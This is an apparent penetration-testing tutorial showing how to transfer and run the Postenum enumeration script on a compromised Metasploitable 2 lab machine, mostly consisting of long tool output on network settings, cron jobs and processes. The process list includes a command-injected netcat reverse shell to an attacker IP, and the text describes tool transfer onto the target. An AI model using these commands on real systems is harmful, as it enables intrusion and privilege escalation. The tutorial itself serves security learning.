How to Use Postenum to Gather Vital Data During Post-Exploitation

Jun 18, 2020 09:00 PM
637171907124535452.jpg

Post-exploitation is often not quite as exciting as popping the initial shell, but it's a crucial phase for gathering data and further privilege escalation. Once a target is compromised, there's a lot of information to find and sift through. Luckily, there are tools available that can make the process easy. One such tool is Postenum.

To show everything Postenum has to offer for post-exploitation, we're using Kali Linux as our local machine. As for the target, if you want to follow along and try the tool out as a white hat or penetration tester, Metasploitable 2 is a good intentionally vulnerable virtual machine to use.

Phase 1: Initial Compromise

Before we can use Postenum, we must first exploit the target and get a shell. We can use command injection to run operating system commands on the server and abuse its functionality to get a reverse shell.

We'll also want to upgrade our new shell to a fully interactive one. That will make it easier to work in general and will also let us use tab completion and terminal history. And we'll assume the target has limited connectivity to the internet, so we'll need to find a way to transfer Postenum from our local machine.

First, grab the script from GitHub with the wget command:

~# wget https://raw.githubusercontent.com/mbahadou/postenum/master/postenum.sh

--2020-06-18 16:14:29--  https://raw.githubusercontent.com/mbahadou/postenum/master/postenum.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 56110 (55K) [text/plain]
Saving to: ‘postenum.sh’

postenum.sh          100%[======================>]  54.79K  --.-KB/s    in 0.07s

2020-06-18 16:14:29 (749 KB/s) - ‘postenum.sh’ saved [56110/56110]

Next, we can start a simple server using Python to serve the file over HTTP:

~# python -m SimpleHTTPServer

Serving HTTP on 0.0.0.0 port 8000 ...

Back on the target system, let's move to a writable directory so we can download and run our script:

target:/var/vulnerabilities/exec$ cd /var/tmp/

target:/var/tmp$

Grab the file we are hosting on our machine, taking care to use the appropriate IP address:

target:/var/tmp$ wget http://10.10.0.1:8000/postenum.sh

--16:16:24--  http://10.10.0.1:8000/postenum.sh
           => `postenum.sh'
Connecting to 10.10.0.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 43,831 (43K) [text/x-sh]

100%[=================================================================================================================================================================================================>] 43,831        --.--K/s

16:16:24 (53.19 MB/s) - `postenum.sh' saved [43831/43831]

We should see the request where our server is running if everything was successful:

Serving HTTP on 0.0.0.0 port 8000 ...
10.10.0.50 - - [18/Jun/2020 10:49:36] "GET /postenum.sh HTTP/1.0" 200 -

And we can kill this now that we have transferred the script. Then, if we list the contents of the directory, we'll see that the script isn't executable yet:

target:/var/tmp$ ls -la

total 52
drwxrwxrwt  2 root     root      4096 Jun 16 13:35 .
drwxr-xr-x 14 root     root      4096 Mar 17  2010 ..
-rw-r--r--  1 www-data www-data 43831 Jun 18  2020 postenum.sh

Use the chmod command to make it executable:

target:/var/tmp$ chmod +x postenum.sh

And we should see that it's now able to execute:

target:/var/tmp$ ls -la

total 52
drwxrwxrwt  2 root     root      4096 Jun 16 13:35 .
drwxr-xr-x 14 root     root      4096 Mar 17  2010 ..
-rw-r--r--  1 www-data www-data 43831 Jun 18  2020 postenum.sh

To run it, simply use the dot-slash for Bash scripts:

target:/var/tmp$ ./postenum.sh

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

 Usage   > ./postenum.sh <option>
 Options >
        -a :    All
        -s :    Filesystem [SUID, SGID, Config/DB files, etc.]
        -l :    Shell escape and development tools
        -c :    The most interesting files
        -n :    Network settings
        -p :    Services and cron jobs
        -o :    OS informations and priv esc exploits
        -v :    Sofware's versions
        -t :    Fstab credentials and databases checker

That will give us a nice little banner and some usage options.

Phase 2: Network Settings

The first option we'll cover will gather networking information and settings. Use the -n switch to kick it off:

target:/var/tmp$ ./postenum.sh -n

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] COMMUNICATING and NETWORKING
[+] - Check NIC(s) does the system have
[x] Available network interfaces on the system:
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
        address 10.10.0.50
        netmask 255.255.255.0
        gateway 10.10.0.1

[x] Hosts:
127.0.0.1       localhost
127.0.1.1       target.localdomain      target

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts

[+] - Check network configuration settings
[x] DNS name servers:
search localdomain
nameserver 172.16.1.1

[x] Networks:
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0

[x] hostname:
target

[x] Get DNS domain or the FQDN:
localdomain

[+] - Check users and hosts communicating with the system
[x] Display all TCP/UDP connected socket, PID/program:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:512             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:513             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:2049            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:514             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:8009            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:6697            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:41801           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:1099            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:47536           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:8787            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:8180            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:1524            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      -
tcp        0      0 10.10.0.50:53           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:44182           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:5432            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:953           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:51902           0.0.0.0:*               LISTEN      -
tcp        0      0 10.10.0.50:34846        10.10.0.1:1234          ESTABLISHED 4789/bash
tcp6       0      0 :::2121                 :::*                    LISTEN      -
tcp6       0      0 :::3632                 :::*                    LISTEN      -
tcp6       0      0 :::53                   :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 :::5432                 :::*                    LISTEN      -
tcp6       0      0 ::1:953                 :::*                    LISTEN      -
udp        0      0 0.0.0.0:2049            0.0.0.0:*                           -
udp        0      0 10.10.0.50:137          0.0.0.0:*                           -
udp        0      0 0.0.0.0:137             0.0.0.0:*                           -
udp        0      0 10.10.0.50:138          0.0.0.0:*                           -
udp        0      0 0.0.0.0:138             0.0.0.0:*                           -
udp        0      0 127.0.0.1:47783         127.0.0.1:47783         ESTABLISHED -
udp        0      0 0.0.0.0:36136           0.0.0.0:*                           -
udp        0      0 0.0.0.0:945             0.0.0.0:*                           -
udp        0      0 10.10.0.50:53           0.0.0.0:*                           -
udp        0      0 127.0.0.1:53            0.0.0.0:*                           -
udp        0      0 0.0.0.0:52929           0.0.0.0:*                           -
udp        0      0 0.0.0.0:69              0.0.0.0:*                           -
udp        0      0 0.0.0.0:40927           0.0.0.0:*                           -
udp        0      0 0.0.0.0:55275           0.0.0.0:*                           -
udp        0      0 0.0.0.0:111             0.0.0.0:*                           -
udp6       0      0 :::53                   :::*                                -
udp6       0      0 :::50653                :::*                                -

[x] List files based on their Internet address:
COMMAND  PID     USER   FD   TYPE DEVICE SIZE NODE NAME
bash    4789 www-data    0u  IPv4  12807       TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)
bash    4789 www-data    1u  IPv4  12807       TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)
python  4797 www-data    0u  IPv4  12807       TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)
python  4797 www-data    1u  IPv4  12807       TCP 10.10.0.50:34846->10.10.0.1:1234 (ESTABLISHED)

[x] Last logged in users:
root     pts/0        :0.0             Wed Jun 17 13:22   still logged in
reboot   system boot  2.6.24-16-server Wed Jun 17 13:21 - 13:43  (00:21)
msfadmin tty1                          Wed Jun 17 15:40 - down   (00:00)
msfadmin tty1                          Wed Jun 17 15:40 - 15:40  (00:00)

wtmp begins Wed Jun 18 15:38:50 2020

[x] Who is logged on and what they are doing:
 13:43:00 up 22 min,  1 user,  load average: 0.02, 0.04, 0.07
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    :0.0             13:22   21:03m  0.05s  0.05s -bash

[+] - Check cached IP and/or MAC addresses

We can see it gives us a bunch of information, starting with available network interfaces and hostnames and addresses. It then shows us some DNS information and any symbolic names for the network. Finally, it shows us the hosts and users communicating with the system, followed by logged in users and relevant information.

Phase 3: Services & Cron Jobs

The next option we'll look at will discover running services and any cron jobs that are present on the system. Use the -p switch for this:

target:/var/tmp$ ./postenum.sh -p

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] APPS and SERVICES
[+] - Check jobs scheduled
[x] Search on cron in /etc:
drwxr-xr-x  2 root     root     4096 Jul  5  2018 cron.d
drwxr-xr-x  2 root     root     4096 Apr 28  2010 cron.daily
drwxr-xr-x  2 root     root     4096 Mar 16  2010 cron.hourly
drwxr-xr-x  2 root     root     4096 Apr 28  2010 cron.monthly
drwxr-xr-x  2 root     root     4096 Mar 16  2010 cron.weekly
-rw-r--r--  1 root     root      724 Apr  8  2008 crontab

[x] List /etc/cron.d/
-rw-r--r-- 1 root root  507 May  3  2012 php5
-rw-r--r-- 1 root root 1323 Mar 31  2008 postgresql-common

[x] Root's cron jobs:
no crontab for www-data

[x] The content of /etc/crontab:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

[x] View daily cron jobs:
-rwxr-xr-x 1 root root  633 Feb  1  2008 apache2
-rwxr-xr-x 1 root root 7441 Apr 22  2008 apt
-rwxr-xr-x 1 root root  314 Apr  4  2008 aptitude
-rwxr-xr-x 1 root root  502 Dec 12  2007 bsdmainutils
-rwxr-xr-x 1 root root   89 Jun 17  2006 logrotate
-rwxr-xr-x 1 root root  954 Mar 12  2008 man-db
-rwxr-xr-x 1 root root  183 Mar  8  2008 mlocate
-rwxr-xr-x 1 root root  383 Apr 28  2010 samba
-rwxr-xr-x 1 root root 3295 Apr  8  2008 standard
-rwxr-xr-x 1 root root 1309 Nov 23  2007 sysklogd
-rwxr-xr-x 1 root root  477 Dec  7  2008 tomcat55

[x] View monthly cron jobs:
-rwxr-xr-x 1 root root 664 Feb 20  2008 proftpd
-rwxr-xr-x 1 root root 129 Apr  8  2008 standard

[x] View weekly cron jobs:
-rwxr-xr-x 1 root root  528 Mar 12  2008 man-db
-rwxr-xr-x 1 root root 2522 Jan 28  2008 popularity-contest
-rwxr-xr-x 1 root root 1220 Nov 23  2007 sysklogd

[+] - Check for running services, and which service(s) are been running by root
[x] Display every process on the system:
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.1  0.6   2844  1696 ?        Ss   13:20   0:01 /sbin/init
root         2  0.0  0.0      0     0 ?        S<   13:20   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S<   13:20   0:00 [migration/0]
root         4  0.0  0.0      0     0 ?        S<   13:20   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   13:20   0:00 [watchdog/0]
root         6  0.0  0.0      0     0 ?        S<   13:20   0:00 [events/0]
root         7  0.0  0.0      0     0 ?        S<   13:20   0:00 [khelper]
root        41  0.0  0.0      0     0 ?        S<   13:20   0:00 [kblockd/0]
root        44  0.0  0.0      0     0 ?        S<   13:20   0:00 [kacpid]
root        45  0.0  0.0      0     0 ?        S<   13:20   0:00 [kacpi_notify]
root        88  0.0  0.0      0     0 ?        S<   13:20   0:00 [kseriod]
root       125  0.0  0.0      0     0 ?        S    13:20   0:00 [pdflush]
root       126  0.0  0.0      0     0 ?        S    13:20   0:00 [pdflush]
root       127  0.0  0.0      0     0 ?        S<   13:20   0:00 [kswapd0]
root       169  0.0  0.0      0     0 ?        S<   13:20   0:00 [aio/0]
root      1125  0.0  0.0      0     0 ?        S<   13:20   0:00 [ksnapd]
root      1316  0.0  0.0      0     0 ?        S<   13:20   0:00 [ata/0]
root      1318  0.0  0.0      0     0 ?        S<   13:20   0:00 [ata_aux]
root      1327  0.0  0.0      0     0 ?        S<   13:20   0:00 [scsi_eh_0]
root      1340  0.0  0.0      0     0 ?        S<   13:20   0:00 [scsi_eh_1]
root      1345  0.0  0.0      0     0 ?        S<   13:20   0:00 [ksuspend_usbd]
root      1353  0.0  0.0      0     0 ?        S<   13:20   0:00 [khubd]
root      1771  0.0  0.0      0     0 ?        S<   13:20   0:00 [scsi_eh_2]
root      2295  0.0  0.0      0     0 ?        S<   13:20   0:00 [kjournald]
root      2460  0.0  0.2   2216   652 ?        S<s  13:20   0:01 /sbin/udevd --daemon
root      2706  0.0  0.0      0     0 ?        S<   13:20   0:00 [kpsmoused]
root      3588  0.0  0.0      0     0 ?        S<   13:21   0:00 [kjournald]
daemon    3717  0.0  0.2   1836   524 ?        Ss   13:21   0:00 /sbin/portmap
statd     3737  0.0  0.2   1900   728 ?        Ss   13:21   0:00 /sbin/rpc.statd
root      3743  0.0  0.0      0     0 ?        S<   13:21   0:00 [rpciod/0]
root      3758  0.0  0.2   3648   564 ?        Ss   13:21   0:00 /usr/sbin/rpc.idmapd
root      3985  0.0  0.1   1716   488 tty4     Ss+  13:21   0:00 /sbin/getty 38400 tty4
root      3986  0.0  0.1   1716   492 tty5     Ss+  13:21   0:00 /sbin/getty 38400 tty5
root      3990  0.0  0.1   1716   488 tty2     Ss+  13:21   0:00 /sbin/getty 38400 tty2
root      3993  0.0  0.1   1716   492 tty3     Ss+  13:21   0:00 /sbin/getty 38400 tty3
root      3996  0.0  0.1   1716   488 tty6     Ss+  13:21   0:00 /sbin/getty 38400 tty6
syslog    4034  0.0  0.2   1936   648 ?        Ss   13:21   0:00 /sbin/syslogd -u syslog
root      4069  0.0  0.2   1872   540 ?        S    13:21   0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
klog      4071  0.0  0.8   3152  2052 ?        Ss   13:21   0:00 /sbin/klogd -P /var/run/klogd/kmsg
bind      4094  0.0  3.0  35408  7676 ?        Ssl  13:21   0:00 /usr/sbin/named -u bind
root      4116  0.0  0.3   5312   996 ?        Ss   13:21   0:00 /usr/sbin/sshd
root      4193  0.0  0.5   2768  1304 ?        S    13:21   0:00 /bin/sh /usr/bin/mysqld_safe
mysql     4235  0.1  6.6 127560 17036 ?        Sl   13:21   0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
root      4236  0.0  0.2   1700   556 ?        S    13:21   0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
postgres  4323  0.1  1.9  41340  5068 ?        S    13:21   0:01 /usr/lib/postgresql/8.3/bin/postgres -D /var/lib/postgresql/8.3/main -c config_file=/etc/postgresql/8.3/main/postgresql.conf
postgres  4326  0.2  0.5  41340  1376 ?        Ss   13:21   0:03 postgres: writer process
postgres  4327  0.2  0.4  41340  1188 ?        Ss   13:21   0:03 postgres: wal writer process
postgres  4328  0.0  0.5  41476  1432 ?        Ss   13:21   0:01 postgres: autovacuum launcher process
postgres  4329  0.0  0.4  12660  1172 ?        Ss   13:21   0:00 postgres: stats collector process
daemon    4349  0.0  0.1   2316   424 ?        SNs  13:21   0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
daemon    4350  0.0  0.0   2316   216 ?        SN   13:21   0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
root      4399  0.0  0.0      0     0 ?        S    13:21   0:00 [lockd]
root      4400  0.0  0.0      0     0 ?        S<   13:21   0:00 [nfsd4]
root      4401  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4402  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4403  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4404  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4405  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4406  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4407  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4408  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4412  0.0  0.1   2424   332 ?        Ss   13:21   0:00 /usr/sbin/rpc.mountd
daemon    4437  0.0  0.0   2316   216 ?        SN   13:21   0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
daemon    4479  0.0  0.0   2316   216 ?        SN   13:21   0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
root      4480  0.0  0.6   5412  1728 ?        Ss   13:21   0:00 /usr/lib/postfix/master
postfix   4484  0.0  0.6   5420  1644 ?        S    13:21   0:00 pickup -l -t fifo -u -c
postfix   4485  0.0  0.6   5460  1688 ?        S    13:21   0:00 qmgr -l -t fifo -u
root      4487  0.0  0.4   5388  1204 ?        Ss   13:21   0:00 /usr/sbin/nmbd -D
root      4489  0.0  0.5   7724  1364 ?        Ss   13:21   0:00 /usr/sbin/smbd -D
root      4493  0.0  0.3   7724   812 ?        S    13:21   0:00 /usr/sbin/smbd -D
root      4508  0.0  0.3   2424   856 ?        Ss   13:21   0:00 /usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive -inetd_compat
proftpd   4545  0.0  0.6   9948  1592 ?        Ss   13:21   0:00 proftpd: (accepting connections)
daemon    4559  0.0  0.1   1984   424 ?        Ss   13:21   0:00 /usr/sbin/atd
root      4570  0.0  0.3   2104   896 ?        Ss   13:21   0:00 /usr/sbin/cron
root      4598  0.0  0.1   2052   348 ?        Ss   13:21   0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root      4599  0.0  0.1   2052   476 ?        S    13:21   0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
tomcat55  4601  5.3 44.8 389632 114652 ?       Sl   13:21   1:12 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root      4619  0.0  1.0  10596  2564 ?        Ss   13:21   0:00 /usr/sbin/apache2 -k start
www-data  4621  0.0  0.9  10728  2516 ?        S    13:21   0:00 /usr/sbin/apache2 -k start
www-data  4624  0.0  0.9  10728  2492 ?        S    13:21   0:00 /usr/sbin/apache2 -k start
www-data  4626  0.0  0.8  10596  2096 ?        S    13:21   0:00 /usr/sbin/apache2 -k start
www-data  4628  0.0  0.9  10596  2436 ?        S    13:21   0:00 /usr/sbin/apache2 -k start
www-data  4629  0.0  0.9  10728  2500 ?        S    13:21   0:00 /usr/sbin/apache2 -k start
root      4638  0.0 10.3  66344 26472 ?        Sl   13:21   0:00 /usr/bin/rmiregistry
root      4642  0.5  1.0  12208  2568 ?        Sl   13:21   0:08 ruby /usr/sbin/druby_timeserver.rb
root      4649  0.0  0.1   1716   488 tty1     Ss+  13:21   0:00 /sbin/getty 38400 tty1
root      4657  0.0  0.9   8540  2372 ?        S    13:21   0:01 /usr/bin/unrealircd
root      4659  0.3  4.7  14036 12016 ?        S    13:21   0:04 Xtightvnc :0 -desktop X -auth /root/.Xauthority -geometry 1024x768 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5900 -fp /usr/X11R6/lib/X11/fonts/Type1/,/usr/X11R6/lib/X11/fonts/Speedo/,/usr/X11R6/lib/X11/fonts/misc/,/usr/X11R6/lib/X11/fonts/75dpi/,/usr/X11R6/lib/X11/fonts/100dpi/,/usr/share/fonts/X11/misc/,/usr/share/fonts/X11/Type1/,/usr/share/fonts/X11/75dpi/,/usr/share/fonts/X11/100dpi/ -co /etc/X11/rgb
root      4664  0.0  0.4   2724  1188 ?        S    13:21   0:00 /bin/sh /root/.vnc/xstartup
root      4667  0.0  1.0   5936  2572 ?        S    13:21   0:00 xterm -geometry 80x24+10+10 -ls -title X Desktop
root      4670  0.3  1.9   8988  5000 ?        S    13:21   0:05 fluxbox
root      4704  0.0  0.6   2852  1544 pts/0    Ss+  13:22   0:00 -bash
www-data  4759  0.0  0.7  10596  1956 ?        S    13:23   0:00 /usr/sbin/apache2 -k start
www-data  4780  0.0  0.7  10596  1956 ?        S    13:29   0:00 /usr/sbin/apache2 -k start
www-data  4787  0.0  0.5   3248  1460 ?        S    13:29   0:00 sh -c ping  -c 3 localhost && nc 10.10.0.1 1234 -e /bin/bash
www-data  4789  0.0  0.5   3248  1448 ?        S    13:29   0:00 bash
www-data  4797  0.0  0.9   3960  2472 ?        S    13:31   0:00 python -c import pty;pty.spawn("/bin/bash")
www-data  4798  0.0  0.7   3400  1868 pts/1    Ss   13:31   0:00 /bin/bash
www-data  4927  0.0  0.7   3644  1888 pts/1    S+   13:44   0:00 /bin/bash ./postenum.sh -p
www-data  4956  0.0  0.4   3616  1204 pts/1    S+   13:44   0:00 /bin/bash ./postenum.sh -p
www-data  4957  0.0  0.3   2364   932 pts/1    R+   13:44   0:00 ps aux

[x] Process binaries and permissions:
692K -rwxr-xr-x 1 root root 686K Apr 14  2008 /bin/bash
 48K -rwxr-xr-x 1 root root  48K Apr  4  2008 /bin/dd
   0 lrwxrwxrwx 1 root root    4 Apr 28  2010 /bin/sh -> bash
 16K -rwxr-xr-x 1 root root  15K Apr 14  2008 /sbin/getty
 92K -rwxr-xr-x 1 root root  88K Apr 11  2008 /sbin/init
 24K -rwxr-xr-x 1 root root  23K Nov 23  2007 /sbin/klogd
 16K -rwxr-xr-x 1 root root  15K Dec  3  2007 /sbin/portmap
 40K -rwxr-xr-x 1 root root  39K Dec  2  2008 /sbin/rpc.statd
 32K -rwxr-xr-x 1 root root  32K Nov 23  2007 /sbin/syslogd
 72K -rwxr-xr-x 1 root root  67K Apr 11  2008 /sbin/udevd
 32K -rwxr-xr-x 1 root root  31K May 21  2007 /usr/bin/jsvc
   0 lrwxrwxrwx 1 root root   29 Apr 28  2010 /usr/bin/rmiregistry -> /etc/alternatives/rmiregistry
1.4M -rwx------ 1 root root 1.4M May 20  2012 /usr/bin/unrealircd
 28K -rwxr-xr-x 1 root root  28K Apr 18  2008 /usr/lib/postfix/master
3.5M -rwxr-xr-x 1 root root 3.5M Mar 21  2008 /usr/lib/postgresql/8.3/bin/postgres
348K -rwxr-xr-x 1 root root 341K Mar  9  2010 /usr/sbin/apache2
 16K -rwxr-xr-x 1 root root  16K Feb 20  2007 /usr/sbin/atd
 32K -rwxr-xr-x 1 root root  31K Apr  8  2008 /usr/sbin/cron
7.1M -rwxr-xr-x 1 root root 7.1M Mar 28  2008 /usr/sbin/mysqld
348K -rwxr-xr-x 1 root root 343K Apr  9  2008 /usr/sbin/named
952K -rwxr-xr-x 1 root root 948K Apr 28  2010 /usr/sbin/nmbd
 36K -rwxr-xr-x 1 root root  35K Dec  2  2008 /usr/sbin/rpc.idmapd
 76K -rwxr-xr-x 1 root root  72K Dec  2  2008 /usr/sbin/rpc.mountd
3.0M -rwxr-xr-x 1 root root 3.0M Apr 28  2010 /usr/sbin/smbd
368K -rwxr-xr-x 1 root root 363K Apr  6  2008 /usr/sbin/sshd
140K -rwxr-xr-x 1 root root 135K Dec  3  2007 /usr/sbin/xinetd

[x] Display every process running by root on the system:
root         1  0.1  0.6   2844  1696 ?        Ss   13:20   0:01 /sbin/init
root         2  0.0  0.0      0     0 ?        S<   13:20   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S<   13:20   0:00 [migration/0]
root         4  0.0  0.0      0     0 ?        S<   13:20   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   13:20   0:00 [watchdog/0]
root         6  0.0  0.0      0     0 ?        S<   13:20   0:00 [events/0]
root         7  0.0  0.0      0     0 ?        S<   13:20   0:00 [khelper]
root        41  0.0  0.0      0     0 ?        S<   13:20   0:00 [kblockd/0]
root        44  0.0  0.0      0     0 ?        S<   13:20   0:00 [kacpid]
root        45  0.0  0.0      0     0 ?        S<   13:20   0:00 [kacpi_notify]
root        88  0.0  0.0      0     0 ?        S<   13:20   0:00 [kseriod]
root       125  0.0  0.0      0     0 ?        S    13:20   0:00 [pdflush]
root       126  0.0  0.0      0     0 ?        S    13:20   0:00 [pdflush]
root       127  0.0  0.0      0     0 ?        S<   13:20   0:00 [kswapd0]
root       169  0.0  0.0      0     0 ?        S<   13:20   0:00 [aio/0]
root      1125  0.0  0.0      0     0 ?        S<   13:20   0:00 [ksnapd]
root      1316  0.0  0.0      0     0 ?        S<   13:20   0:00 [ata/0]
root      1318  0.0  0.0      0     0 ?        S<   13:20   0:00 [ata_aux]
root      1327  0.0  0.0      0     0 ?        S<   13:20   0:00 [scsi_eh_0]
root      1340  0.0  0.0      0     0 ?        S<   13:20   0:00 [scsi_eh_1]
root      1345  0.0  0.0      0     0 ?        S<   13:20   0:00 [ksuspend_usbd]
root      1353  0.0  0.0      0     0 ?        S<   13:20   0:00 [khubd]
root      1771  0.0  0.0      0     0 ?        S<   13:20   0:00 [scsi_eh_2]
root      2295  0.0  0.0      0     0 ?        S<   13:20   0:00 [kjournald]
root      2460  0.0  0.2   2216   652 ?        S<s  13:20   0:01 /sbin/udevd --daemon
root      2706  0.0  0.0      0     0 ?        S<   13:20   0:00 [kpsmoused]
